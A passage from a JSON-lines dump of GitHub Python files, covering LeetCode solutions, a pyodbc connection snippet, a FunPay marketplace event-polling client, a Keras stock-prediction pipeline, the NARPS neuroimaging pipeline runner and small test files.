DSU(object):\n def __init__(self, length):\n self.par = list(range(length))\n self.isLand = [False] * length\n self.rank = [1] * length\n self.count = 0\n\n def find(self, x):\n if self.par[x] != x:\n self.par[x] = self.find(self.par[x])\n return self.par[x]\n\n def union(self, x, y):\n px, py = self.find(x), self.find(y)\n if px == py:\n return False\n if self.rank[px] >= self.rank[py]:\n self.par[py] = px\n self.rank[px] += self.rank[py]\n else:\n self.par[px] = py\n self.rank[py] += self.rank[px]\n self.count -= 1\n return True\n\n def addLand(self, x):\n self.isLand[x] = True\n self.count += 1\n\n def index(x, y):\n return x * n + y\n\n dsu = DSU(m * n)\n res = list()\n directions = [[-1, 0], [1, 0], [0, 1], [0, -1]]\n\n for p in positions:\n x, y = p.x, p.y\n dsu.addLand(index(x, y))\n\n for dr, dc in directions:\n dx, dy = x + dr, y + dc\n if dx in range(m) and dy in range(n) and dsu.isLand[index(dx, dy)]:\n dsu.union(index(x, y), index(dx, dy))\n\n res.append(dsu.count)\n return res\n\n\nif __name__ == '__main__':\n n = 8\n m = 14\n A = [[0,9],[5,4],[0,12],[6,9],[6,5],[0,4],[4,11],[0,0],[3,5],[6,7],[3,12],[0,5],[6,13],[7,5],[3,6],[4,4],[0,8],[3,1],[4,6],[6,1],[5,12],[3,8],[7,0],[2,9],[1,4],[3,0],[1,13],[2,13],[6,0],[6,4],[0,13],[0,3],[7,4],[1,8],[5,5],[5,7],[5,10],[5,3],[6,10],[6,2],[3,10],[2,7],[1,12],[5,0],[4,5],[7,13],[3,2]]\n operators = [Point(x, y) for x, y in A]\n print(Solution().numIslands2(n, m, operators))\n","repo_name":"amogchandrashekar/Leetcode","sub_path":"Medium/Number of Islands II.py","file_name":"Number of Islands II.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"18742035905","text":"import pyodbc\n\ndados_conexao = (\n 'DRIVER={ODBC Driver 18 for SQL Server};'\n 'SERVER=bigniga\\sqltalisson;'\n 'DATABASE=SQL_BD_1;'\n 'Trusted_Connection=yes;'\n)\n\nconexao = pyodbc.connect(dados_conexao)\nprint('Conexão Bem Sucedida')","repo_name":"talissonEloia/SQL","sub_path":"SQL_SERVER_TROVATO/Conect SQL to python com pyodbc.py","file_name":"Conect SQL to python com 
pyodbc.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"31448511763","text":"\"\"\"\nВ данном модуле написан класс Runner'а.\n\"\"\"\n\nfrom bs4 import BeautifulSoup\nfrom typing import Iterator\nfrom copy import deepcopy\nimport traceback\nimport requests\nimport logging\nimport json\nimport time\n\nfrom . import utils\nfrom . import types\nfrom . import account\nfrom . import exceptions\n\n\nlogger = logging.getLogger(\"FunPayAPI.runner\")\n\n\nclass Runner:\n \"\"\"\n Класс для получения новых событий с FunPay.\n \"\"\"\n def __init__(self, account_instance: account.Account, timeout: float | int = 10.0):\n \"\"\"\n :param account_instance: экземпляр класса аккаунта.\n\n :param timeout: тайм-аут ожидания ответа на запросы.\n \"\"\"\n self.account = account_instance\n self.timeout = timeout\n\n self.last_message_event_tag = utils.gen_random_tag()\n self.last_order_event_tag = utils.gen_random_tag()\n\n self.saved_messages: dict[int, types.Message] = {}\n self.saved_orders: dict[str, types.Order] = {}\n\n self.first_request = True\n self.session = requests.session()\n\n def get_updates(self) -> list[types.NewMessageEvent | types.NewOrderEvent | types.OrderStatusChangedEvent]:\n \"\"\"\n Получает и парсит список событий FunPay.\n\n :return: список событий.\n \"\"\"\n if not self.account.is_authorized():\n raise exceptions.NotAuthorized()\n\n orders = {\n \"type\": \"orders_counters\",\n \"id\": self.account.id,\n \"tag\": self.last_order_event_tag,\n \"data\": False\n }\n chats = {\n \"type\": \"chat_bookmarks\",\n \"id\": self.account.id,\n \"tag\": self.last_message_event_tag,\n \"data\": False\n }\n payload = {\n \"objects\": json.dumps([orders, chats]),\n \"request\": False,\n \"csrf_token\": self.account.csrf_token\n }\n headers = {\n \"accept\": \"*/*\",\n \"cookie\": f\"golden_key={self.account.golden_key}; PHPSESSID={self.account.session_id}\",\n \"content-type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\n \"x-requested-with\": \"XMLHttpRequest\",\n \"user-agent\": self.account.user_agent\n }\n response = self.session.post(types.Links.RUNNER, headers=headers, data=payload, timeout=self.timeout,\n proxies=self.account.proxy)\n logger.debug(f\"Статус-код получения данных о событиях: {response.status_code}.\")\n if response.status_code != 200:\n raise exceptions.StatusCodeIsNot200(response.status_code)\n\n json_response = response.json()\n logger.debug(f\"Получены данные о событиях: {json_response}\")\n\n events = []\n\n for obj in json_response[\"objects\"]:\n if obj.get(\"type\") == \"chat_bookmarks\":\n if not self.first_request:\n events.append(types.MessagesListChangedEvent(self.last_message_event_tag))\n self.last_message_event_tag = obj.get(\"tag\")\n self.account.update_chats(obj[\"data\"][\"html\"])\n soup = BeautifulSoup(obj[\"data\"][\"html\"], \"html.parser\")\n messages = soup.find_all(\"a\", {\"class\": \"contact-item\"})\n\n for msg in messages:\n unread = True if \"unread\" in msg.get(\"class\") else False\n node_id = int(msg[\"data-id\"])\n message_text = msg.find(\"div\", {\"class\": \"contact-item-message\"}).text\n # Если это старое сообщение (сохранено в self.last_messages) -> пропускаем.\n if node_id in self.saved_messages:\n last_msg = self.saved_messages[node_id]\n if last_msg.text == message_text:\n continue\n\n chat_with = msg.find(\"div\", {\"class\": \"media-user-name\"}).text\n message_obj = types.Message(message_text, node_id, chat_with, 
unread, True)\n                    if self.first_request:\n                        event = types.InitialMessageEvent(message_obj, self.last_message_event_tag)\n                    else:\n                        event = types.NewMessageEvent(message_obj, self.last_message_event_tag)\n                    events.append(event)\n                    self.saved_messages[message_obj.node_id] = message_obj\n\n            elif obj.get(\"type\") == \"orders_counters\":\n                self.last_order_event_tag = obj.get(\"tag\")\n                if not self.first_request:\n                    events.append(types.OrdersListChangedEvent(obj[\"data\"][\"buyer\"], obj[\"data\"][\"seller\"],\n                                                               self.last_order_event_tag))\n                attempts = 3\n                while attempts:\n                    try:\n                        orders_list = self.account.get_orders(include_outstanding=True, include_refund=True,\n                                                              include_completed=True)\n                        break\n                    except exceptions.StatusCodeIsNot200 as e:\n                        logger.error(e)\n                        attempts -= 1\n                        time.sleep(1)\n                    except:\n                        logger.error(\"Failed to refresh the orders list.\")\n                        logger.debug(\"------TRACEBACK------\", exc_info=True)\n                        attempts -= 1\n                        time.sleep(1)\n                if not attempts:\n                    logger.error(\"Failed to refresh the orders list: maximum number of attempts exceeded.\")\n                    return []\n\n                for order in orders_list:\n                    if order.id not in self.saved_orders:\n                        if self.first_request:\n                            event = types.InitialOrderEvent(order, self.last_order_event_tag)\n                            events.append(event)\n                        else:\n                            event = types.NewOrderEvent(order, self.last_order_event_tag)\n                            events.append(event)\n                            if order.status == types.OrderStatuses.COMPLETED:\n                                event2 = types.OrderStatusChangedEvent(order, self.last_order_event_tag)\n                                events.append(event2)\n                        self.update_saved_order(order)\n                    elif order.status != self.saved_orders[order.id].status:\n                        event = types.OrderStatusChangedEvent(order_obj=order, tag=self.last_order_event_tag)\n                        events.append(event)\n                        self.update_saved_order(order)\n\n        if self.first_request:\n            self.first_request = False\n\n        return events\n\n    def update_saved_message(self, message_obj: types.Message) -> None:\n        \"\"\"\n        Updates the last saved message.\n\n        :param message_obj: an instance of the class describing the message.\n        \"\"\"\n        message_copy = deepcopy(message_obj)\n        message_copy.text = message_copy.text.replace(\"[a][/a]\", \"\")\n        message_copy.text = message_copy.text[:250]\n        self.saved_messages[message_copy.node_id] = message_copy\n\n    def update_saved_order(self, order: types.Order) -> None:\n        \"\"\"\n        Updates the last saved state of the order.\n\n        :param order: an instance of the class describing the order.\n        \"\"\"\n        self.saved_orders[order.id] = order\n\n    def listen(self, delay: float | int = 6.0, ignore_exceptions: bool = True) \\\n            -> Iterator[types.Event]:\n        \"\"\"\n        \"Listens\" to FunPay, waiting for new events.\n\n        :param delay: the delay between requests.\n\n        :param ignore_exceptions: ignore errors raised while making requests.\n        \"\"\"\n        if not self.account.is_authorized():\n            raise exceptions.NotAuthorized()\n\n        while True:\n            try:\n                updates = self.get_updates()\n                for event in updates:\n                    yield event\n            except Exception as e:\n                if not ignore_exceptions:\n                    raise e\n                else:\n                    logger.error(\"An error occurred while fetching events \"\n                                 \"(nothing to worry about if this message appears infrequently).\")\n                    logger.debug(\"------TRACEBACK------\", exc_info=True)\n            time.sleep(delay)\n","repo_name":"WinCorVD/FunPayAuto","sub_path":"FunPayAPI/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":9057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72565055554","text":"'''\n\nDescription:\n\nGiven a m x n grid filled with non-negative numbers, find a path from top left to bottom 
right which minimizes the sum of all numbers along its path.\n\nNote: You can only move either down or right at any point in time.\n\nExample:\n\nInput:\n[\n [1,3,1],\n [1,5,1],\n [4,2,1]\n]\nOutput: 7\nExplanation: Because the path 1→3→1→1→1 minimizes the sum.\n\n'''\n\n\n\nfrom typing import List\n\nclass Solution:\n def minPathSum(self, grid: List[List[int]]) -> int:\n \n h, w = len(grid), len(grid[0])\n \n # first column\n for y in range(1, h):\n grid[y][0] = grid[y-1][0] + grid[y][0]\n\n # first row \n for x in range(1, w):\n grid[0][x] = grid[0][x-1] + grid[0][x]\n\n # general case \n for y in range(1, h):\n for x in range(1, w):\n grid[y][x] = min( grid[y-1][x], grid[y][x-1]) + grid[y][x]\n \n \n return grid[-1][-1]\n \n\n\n# m : the dimension of column of grid\n# n : the dimension of row of grid\n\n## Time Complexity: O( m * n)\n#\n# The overhead in time is the nested loop interating on grid, which is of O( m * n ).\n\n## Space Complexity: O( 1 )\n#\n# The update of dp_table is in-place, thus the cost of space is of O( 1 ).\n\nfrom collections import namedtuple\nTestEntry = namedtuple('TestEntry', 'cost_matrix')\n\ndef test_bench():\n\n test_data = [\n TestEntry( cost_matrix = [\n [1,3,1],\n [1,5,1],\n [4,2,1]\n ]\n ),\n \n TestEntry( cost_matrix = [\n [5,6],\n [7,4]\n ]\n ),\n ]\n\n # expected output:\n '''\n 7\n 15\n '''\n\n for t in test_data:\n\n print( Solution().minPathSum( grid = t.cost_matrix ) )\n \n return\n\n\n\nif __name__ == '__main__':\n\n test_bench()","repo_name":"brianchiang-tw/leetcode","sub_path":"2020_April_Leetcode_30_days_challenge/Week_3_Minimum Path Sum/by_in-place_dynamic_programming.py","file_name":"by_in-place_dynamic_programming.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"} +{"seq_id":"73231539073","text":"from carga import models\nfrom django.db.utils import IntegrityError\nimport openpyxl\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n# certificado_obra \n# certificado_financiamiento \n# certificado_rubro \n# certificado_rubro_anticipo \n# certificado_rubro_obra \n# certificado_rubro_devanticipo \n# certificado_expediente \n# certificado_periodo \n# certificado_monto_pesos \n# certificado_mes_pct \n# certificado_ante_pct \n# certificado_acum_pct \n# certificado_devolucion_expte \n# certificado_devolucion_monto \n# certificado_devolucion_monto_uvi\n# certificado_monto_uvi \n# certificado_fecha \n# certificado_monto_cobrar \n# certificado_monto_cobrar_uvi \n# certificado_digital \n\ncertificados = models.Certificado.objects.all()\n\nexpedientes = []\n\nfor certificado in certificados:\n if certificado.certificado_expediente not in expedientes:\n print(f\"{certificado.certificado_expediente} not in list, appending it.\") \n expedientes.append(certificado.certificado_expediente)\n\nprint(f\"{bcolors.OKGREEN}Pending re-run.{bcolors.ENDC}\")\nprint(f\"{bcolors.OKGREEN}Re-running...{bcolors.ENDC}\")\n\nfor certificado in certificados:\n if certificado.certificado_expediente not in expedientes:\n print(f\"{certificado.certificado_expediente} not in list, appending it.\") \n 
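# note: on this re-run pass the list is already populated, so reaching this append would mean the first pass missed an entry\r\n            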
expedientes.append(certificado.certificado_expediente)\n\nprint(f\"{bcolors.OKBLUE}Done.{bcolors.ENDC}\")\nprint(expedientes)\n\n","repo_name":"WillyLobo/Polizador-Production","sub_path":"scripts/expedientes.py","file_name":"expedientes.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73829309635","text":"import logging\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\nimport keras as keras\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Dense, LSTM\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import train_test_split\nfrom pathlib import Path\n\nfrom timeseries import wrangle\nfrom timeseries import fetch\nfrom timeseries import BuildModel\n\n\n\ndef run_fetch_raw_data(ticker='GOOG'):\n \n \"\"\" \n Get raw data from yfinance and \n \"\"\"\n\n logging.info('Fetching raw data from yfinance')\n \n # touch data directory\n try:\n Path('./data').mkdir()\n print('Data directory successfully created')\n except:\n print('Data Directory already exists')\n \n # touch raw data directory\n try:\n Path('./data/raw').mkdir()\n print('Creating directory for raw data')\n except FileExistsError:\n print('Directory for raw data already exists')\n \n \n \n # Define Constants\n #TICKER = \"GOOG\"\n TICKER = ticker\n #START = \"2004-08-19\" # Google IPO date\n START = \"1900-01-01\"\n TODAY = datetime.date(datetime.now()).strftime(\"%Y-%m-%d\")\n OUTPUT_FILE_NAME = \"raw.csv\"\n #OUTPUT_FILE_PATH = \"~/springboard1/capstone2/TimeSeries/data/raw/\" + OUTPUT_FILE_NAME\n OUTPUT_FILE_PATH = \"./data/raw/\" + OUTPUT_FILE_NAME\n #Path('OUTPUT_FILE_PATH').touch()\n\n # get all current google stock data\n stock_data = fetch.get_historical_data(TICKER, START, TODAY)\n\n # log population of csv file\n logging.info(\"Writing yfinance data to \" + OUTPUT_FILE_PATH)\n print(\"Writing yfinance data to \" + OUTPUT_FILE_PATH)\n\n # write data to csv\n stock_data.to_csv(OUTPUT_FILE_PATH)\n \n return\n \ndef run_format_timeseries():\n print('formatting timeseries')\n # raw data file path\n RAW_DATA_FILE_PATH = \"./data/raw/raw.csv\"\n\n # read csv data from\n raw_df = pd.read_csv(RAW_DATA_FILE_PATH, index_col=0, parse_dates=['Date'])\n\n\n adj_close_df = raw_df.iloc[:,4:5]\n\n\n log_scaled_adj_close = wrangle.take_log(adj_close_df)\n log_scaled_adj_close, deltas = wrangle.get_deltas(log_scaled_adj_close)\n\n #previous_df = wrangle.create_previous_days(log_scaled_adj_close, 'Adj Close')\n\n def create_time_series(df, col_name='Adj Close'):\n df = wrangle.create_previous_days(df, col_name)\n #df = create_future_days(df, col_name)\n return df\n\n # touch interim data directory\n try:\n Path('./data/interim').mkdir()\n print('Creating directory for interim data')\n except FileExistsError:\n print('Directory for interim data already exists')\n \n time_series_df = create_time_series(log_scaled_adj_close, 'Adj Close')\n time_series_df.to_csv('./data/interim/time_series.csv')\n #time_series_df.to_csv('../data/interim/time_series.csv')\n print('DONE')\n\n\ndef run_predict_tomorrow():\n # PREPARE DATA\n TEST_SIZE = 0.05\n file_path = './data/interim/time_series.csv'\n\n # read time series data\n time_series_df = BuildModel.read_data(file_path)\n\n\n # extract last row to predict tomorrow's change\n tomorrow = time_series_df.iloc[[-1]].fillna(0)\n\n # call function to format predictors and targets\n tomorrow, _ , _ = 
BuildModel.format_predictors_and_targets(tomorrow)\n    predictors, targets, n_cols = BuildModel.format_predictors_and_targets(time_series_df)\n\n\n    # scale data to range [0,1]\n\n    # create scaler objects\n    X_scaler = MinMaxScaler(feature_range=(0,1))\n    y_scaler = MinMaxScaler(feature_range=(0,1))\n\n    # fit respective scalers to data\n    predictors = X_scaler.fit_transform(predictors)\n    tomorrow = X_scaler.transform(tomorrow)\n    targets = y_scaler.fit_transform(targets)\n\n\n    # test for correct scaling\n    assert min(predictors.flatten()) == 0\n    assert max(predictors.flatten()) == 1\n    assert min(targets.flatten()) == 0\n    assert max(targets.flatten()) == 1\n\n\n    # split data into training set and testing set\n    # SHUFFLE = FALSE\n    X_train, X_test, y_train, y_test = train_test_split(predictors, targets, test_size=TEST_SIZE, shuffle=False, stratify=None, random_state=1)\n\n    # test for sequential split (check X against predictors and y against targets)\n    assert np.argwhere(predictors == X_train[-1])[0][0] == (np.argwhere(predictors == X_test[0])[0][0]) -1\n    assert np.argwhere(targets == y_train[-1])[0][0] == (np.argwhere(targets == y_test[0])[0][0]) -1\n\n\n    # BUILD MODEL\n\n    # re-shape predictors for keras model\n    tomorrow = np.reshape(tomorrow, (1, 1, tomorrow.shape[1]))\n    X_train = np.reshape(X_train, (X_train.shape[0], 1, X_train.shape[1]))\n    X_test = np.reshape(X_test, (X_test.shape[0], 1, X_test.shape[1]))\n\n    assert X_train.shape[1:] == tomorrow.shape[1:]\n\n    # DEFINE MODEL CONSTANTS\n    N_NODES = 100\n    N_LAYERS = 4\n    ADD_DENSE = True\n\n\n    # build Sequential Model\n    model = BuildModel.build_sequential_LSTM(N_NODES, N_LAYERS, ADD_DENSE, X_train)\n\n\n    # Fit the Model Exclusively with Training Data\n\n    # DEFINE TRAINING CONSTANTS\n    EPOCHS = 2\n\n    # fit model to training data\n    model.fit(X_train, y_train, epochs=EPOCHS)\n\n\n    # save and load model\n    save_model = False\n    if save_model:\n        model.save('./models/keras_lstm.h5')\n        model = load_model('./models/keras_lstm.h5')\n\n\n    # Make Predictions and interpret results\n\n    # Make Predictions\n    predictions = model.predict(X_test)\n    tomorrows_prediction = model.predict(tomorrow)\n\n    # revert scaling\n    tomorrow_unscaled = y_scaler.inverse_transform(tomorrows_prediction)\n    unscaled_predictions = y_scaler.inverse_transform(predictions)\n    unscaled_y_test = y_scaler.inverse_transform(y_test)\n\n    # apply exponential function\n    exponential_tomorrow = np.exp(tomorrow_unscaled)\n    exponential_predictions = np.exp(unscaled_predictions)\n    exponential_y_test = np.exp(unscaled_y_test)\n\n    # Inspect quality of predictions\n    places = 4\n    min_pred = round(float(min(exponential_predictions)), places)\n    max_pred = round(float(max(exponential_predictions)), places)\n    mean_pred = round(float(np.mean(exponential_predictions)), places)\n    median_pred = round(float(np.median(exponential_predictions)), places)\n    percentile = round(np.percentile(exponential_predictions, 1.0), places)*100\n    print(\"min pred:\\t\", min_pred)\n    print(\"max pred:\\t\", max_pred)\n    print(\"mean pred:\\t\", mean_pred)\n    print(\"median pred:\\t\", median_pred)\n    print(\"percentile(1.0):\", percentile)\n\n\n    is_good_model = min_pred<=1.0 and max_pred>=1.0\n    assert is_good_model\n\n\n    # SCORE MODEL\n\n    # get accuracy\n    accuracy = BuildModel.get_accuracy(exponential_y_test, exponential_predictions)\n\n\n    # TOMORROW'S PREDICTIONS\n\n    def action(x):\n        \"\"\"\n        params: expected change in stock price\n\n        Map to expected changes in the action column\n\n        Return: \"BUY\" if expected increase, \"SELL\" if expected decrease\n        
\"\"\"\n if x>0:\n return \"BUY\"\n else:\n return \"SELL\"\n\n # read original Adj Close Data\n # read data with Adj Close Price\n raw_data = pd.read_csv('./data/raw/raw.csv', index_col=['Date'])\n\n # display a dataFrame providing insight to th user\n expected_return = float(exponential_tomorrow)\n tomorrow_df = raw_data[['Adj Close']].iloc[[-1]]\n tomorrow_df.columns = ['price_today']\n tomorrow_df['price_tomorrow'] = tomorrow_df['price_today']* expected_return\n tomorrow_df['Action'] = (tomorrow_df.price_tomorrow - tomorrow_df.price_today).map(action)\n print(tomorrow_df)\n\n","repo_name":"AHalarewicz/TimeSeriesAnalysis","sub_path":"timeseries/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":7557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11146000389","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Luna Ganzáles Rocio y Martinez Garcia Isabel\n\"\"\"\nimport json\nAngrafo = False\n\nwith open(\"anchuraarbol.json\", \"r\") as read_file:\n data = json.load(read_file)\n Angrafo = data['angrafo'] \n \ndef recorinodo(tomavla):\n a = 0 \n nodo =[]\n grafo = []\n for n in Angrafo:\n grafo = grafo+[n[\"rama\"].split()]\n nodo = nodo+[n[\"nodo\"].split()]\n for n in grafo:\n print (nodo[a],grafo[a][0])\n if (grafo[a][0] == tomavla):\n return True\n a +=1\n \nrearbol = recorinodo(\"30\")\nif (rearbol == True):\n print (\"Raiz\")","repo_name":"Isabel-Mtz/ProgramasUnidad3","sub_path":"ArbolE1.py","file_name":"ArbolE1.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25589237158","text":"#!/usr/bin/python\n# coding: utf-8\n\n\"\"\" This module allows to run pipelines from NARPS open. \"\"\"\n\nfrom os.path import isfile\nfrom importlib import import_module\nfrom random import choices\nfrom argparse import ArgumentParser\n\nfrom nipype import Workflow\n\nfrom narps_open.pipelines import Pipeline, implemented_pipelines\nfrom narps_open.data.participants import (\n get_all_participants,\n get_participants,\n get_participants_subset\n )\nfrom narps_open.utils.configuration import Configuration\n\nclass PipelineRunner():\n \"\"\" A class that allows to run a NARPS pipeline. \"\"\"\n\n def __init__(self, team_id: str = '') -> None:\n self._pipeline = None\n\n # Set team_id. It's important to use the property setter here,\n # so that the code inside it is executed. 
That would not be the\n # case if simply setting the `self._team_id` attribute i.e.: `self._team_id = team_id`\n self.team_id = team_id\n\n @property\n def pipeline(self) -> Pipeline:\n \"\"\" Getter for property pipeline \"\"\"\n return self._pipeline\n\n @property\n def subjects(self) -> list:\n \"\"\" Getter for property subjects \"\"\"\n return self._pipeline.subject_list\n\n @subjects.setter\n def subjects(self, value: list) -> None:\n \"\"\" Setter for property subjects \"\"\"\n\n all_participants = get_all_participants()\n for subject_id in value:\n if str(int(subject_id)).zfill(3) not in all_participants:\n raise AttributeError(f'Subject ID {subject_id} is not valid')\n\n self._pipeline.subject_list = list(dict.fromkeys(\n [str(int(subject_id)).zfill(3) for subject_id in value])) # remove duplicates\n\n @subjects.setter\n def random_nb_subjects(self, value: int) -> None:\n \"\"\" Setter for property random_nb_subjects \"\"\"\n # Generate a random list of subjects\n self._pipeline.subject_list = choices(get_participants(self.team_id), k = value)\n\n @subjects.setter\n def nb_subjects(self, value: int) -> None:\n \"\"\" Setter for property nb_subjects \"\"\"\n # Get a subset of participants\n self._pipeline.subject_list = get_participants_subset(value)\n\n @property\n def team_id(self) -> str:\n \"\"\" Getter for property team_id \"\"\"\n return self._team_id\n\n @team_id.setter\n def team_id(self, value: str) -> None:\n \"\"\" Setter for property random_nb_subjects \"\"\"\n self._team_id = value\n\n # It's up to the PipelineRunner to find the right pipeline, based on the team ID\n if self._team_id not in implemented_pipelines:\n raise KeyError(f'Wrong team ID : {self.team_id}')\n\n if implemented_pipelines[self._team_id] is None:\n raise NotImplementedError(f'Pipeline not implemented for team : {self.team_id}')\n\n # Instantiate the pipeline\n class_type = getattr(\n import_module('narps_open.pipelines.team_'+self._team_id),\n implemented_pipelines[self._team_id])\n self._pipeline = class_type()\n\n def start(self, first_level_only: bool = False, group_level_only: bool = False) -> None:\n \"\"\"\n Start the pipeline\n\n Arguments:\n - first_level_only: bool (False by default), run the first level workflows only,\n (= preprocessing + run level + subject_level)\n - group_level_only: bool (False by default), run the group level workflows only\n \"\"\"\n print('Starting pipeline for team: '+\n f'{self.team_id}, with {len(self.subjects)} subjects: {self.subjects}')\n\n if first_level_only and group_level_only:\n raise AttributeError('first_level_only and group_level_only cannot both be True')\n\n # Generate workflow list\n workflow_list = []\n if not group_level_only:\n workflow_list += [\n self._pipeline.get_preprocessing(),\n self._pipeline.get_run_level_analysis(),\n self._pipeline.get_subject_level_analysis(),\n ]\n if not first_level_only:\n workflow_list += [\n self._pipeline.get_group_level_analysis()\n ]\n\n nb_procs = Configuration()['runner']['nb_procs']\n\n # Launch workflows\n for workflow in workflow_list:\n if workflow is None:\n pass\n elif isinstance(workflow, list):\n for sub_workflow in workflow:\n if not isinstance(sub_workflow, Workflow):\n raise AttributeError('Workflow must be of type nipype.Workflow')\n\n if nb_procs > 1:\n sub_workflow.run('MultiProc', plugin_args={'n_procs': nb_procs})\n else:\n sub_workflow.run()\n else:\n if not isinstance(workflow, Workflow):\n raise AttributeError('Workflow must be of type nipype.Workflow')\n\n if nb_procs > 1:\n 
workflow.run('MultiProc', plugin_args={'n_procs': nb_procs})\n else:\n workflow.run()\n\n def get_missing_first_level_outputs(self):\n \"\"\" Return the list of missing files after computations of the first level \"\"\"\n files = self._pipeline.get_preprocessing_outputs()\n files += self._pipeline.get_run_level_outputs()\n files += self._pipeline.get_subject_level_outputs()\n\n return [f for f in files if not isfile(f)]\n\n def get_missing_group_level_outputs(self):\n \"\"\" Return the list of missing files after computations of the group level \"\"\"\n files = self._pipeline.get_group_level_outputs()\n\n return [f for f in files if not isfile(f)]\n\nif __name__ == '__main__':\n\n # Parse arguments\n parser = ArgumentParser(description='Run the pipelines from NARPS.')\n parser.add_argument('-t', '--team', type=str, required=True,\n help='the team ID')\n subjects = parser.add_mutually_exclusive_group(required=True)\n subjects.add_argument('-s', '--subjects', nargs='+', type=str, action='extend',\n help='a list of subjects to be selected')\n subjects.add_argument('-n', '--nsubjects', type=str,\n help='the number of subjects to be selected')\n subjects.add_argument('-r', '--rsubjects', type=str,\n help='the number of subjects to be selected randomly')\n levels = parser.add_mutually_exclusive_group(required=False)\n levels.add_argument('-g', '--group', action='store_true', default=False,\n help='run the group level only')\n levels.add_argument('-f', '--first', action='store_true', default=False,\n help='run the first levels only (preprocessing + subjects + runs)')\n parser.add_argument('-c', '--check', action='store_true', required=False,\n help='check pipeline outputs (runner is not launched)')\n arguments = parser.parse_args()\n\n # Initialize a PipelineRunner\n runner = PipelineRunner(team_id = arguments.team)\n runner.pipeline.directories.dataset_dir = Configuration()['directories']['dataset']\n runner.pipeline.directories.results_dir = Configuration()['directories']['reproduced_results']\n runner.pipeline.directories.set_output_dir_with_team_id(arguments.team)\n runner.pipeline.directories.set_working_dir_with_team_id(arguments.team)\n\n # Handle subject\n if arguments.subjects is not None:\n runner.subjects = arguments.subjects\n elif arguments.rsubjects is not None:\n runner.random_nb_subjects = int(arguments.rsubjects)\n else:\n runner.nb_subjects = int(arguments.nsubjects)\n\n # Check data\n if arguments.check:\n missing_files = []\n print('Missing files for team', arguments.team, 'after running',\n len(runner.pipeline.subject_list), 'subjects:')\n if not arguments.group:\n print('First level:', runner.get_missing_first_level_outputs())\n if not arguments.first:\n print('Group level:', runner.get_missing_group_level_outputs())\n\n # Start the runner\n else:\n runner.start(arguments.first, arguments.group)\n","repo_name":"Inria-Empenn/narps_open_pipelines","sub_path":"narps_open/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":8085,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"23547088811","text":"for t in range(1, int(input())+1):\n s, k = input().split()\n s, k, steps = list(s), int(k), 0\n while s:\n if s[0] == '+':\n del s[0]\n else:\n if len(s) < k:\n break\n else:\n steps += 1\n for i in range(k):\n s[i] = '+' if s[i] == '-' else '-'\n #print(s)\n print('Case #{:d}: {:s}'.format(t, str(steps) if not s else 
'IMPOSSIBLE'))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/3659.py","file_name":"3659.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30713176188","text":"from pathlib import Path\nfrom typing import List\n\nfrom chunked_scatter.chunked_scatter import BedRegion, \\\n region_lists_to_scatter_files\n\n\ndef test_bed_writer(tmpdir):\n temp = Path(str(tmpdir))\n temp.rmdir() # Delete to test if function makes the dir.\n region_lists: List[List[BedRegion]] = [\n [BedRegion(\"sparta\", 0, 300),\n BedRegion(\"persians\", 0, 100_000)],\n # But if you actually read Herodotus, the story seems much more likely:\n [BedRegion(\"sparta_and_allies\", 0, 4300),\n BedRegion(\"persian_casualties\", 0, 20000)]\n ]\n\n region_lists_to_scatter_files(region_lists, str(temp / \"scatter-\"))\n assert Path(temp, \"scatter-0.bed\").exists()\n assert Path(temp, \"scatter-0.bed\").read_text() == (\n \"sparta\\t0\\t300\\npersians\\t0\\t100000\\n\")\n assert Path(temp, \"scatter-1.bed\").exists()\n assert Path(temp, \"scatter-1.bed\").read_text() == (\n \"sparta_and_allies\\t0\\t4300\\npersian_casualties\\t0\\t20000\\n\")\n","repo_name":"biowdl/chunked-scatter","sub_path":"tests/test_bed_writer.py","file_name":"test_bed_writer.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36046138714","text":"__metaclass__ = type\n\nfrom lp.services.database.multitablecopy import MultiTableCopy\nfrom lp.services.log.logger import DevNullLogger\nfrom lp.testing import TestCaseWithFactory\nfrom lp.testing.faketransaction import FakeTransaction\nfrom lp.testing.layers import ZopelessDatabaseLayer\nfrom lp.translations.model.distroseries_translations_copy import (\n copy_active_translations,\n )\n\n\nclass EarlyExit(Exception):\n \"\"\"Exception used to force early exit from the copying code.\"\"\"\n def __init__(self, *args, **kwargs):\n self.args = args\n self.kwargs = kwargs\n\n\ndef force_exit(*args, **kwargs):\n \"\"\"Raise `EarlyExit`.\"\"\"\n raise EarlyExit(*args, **kwargs)\n\n\nclass 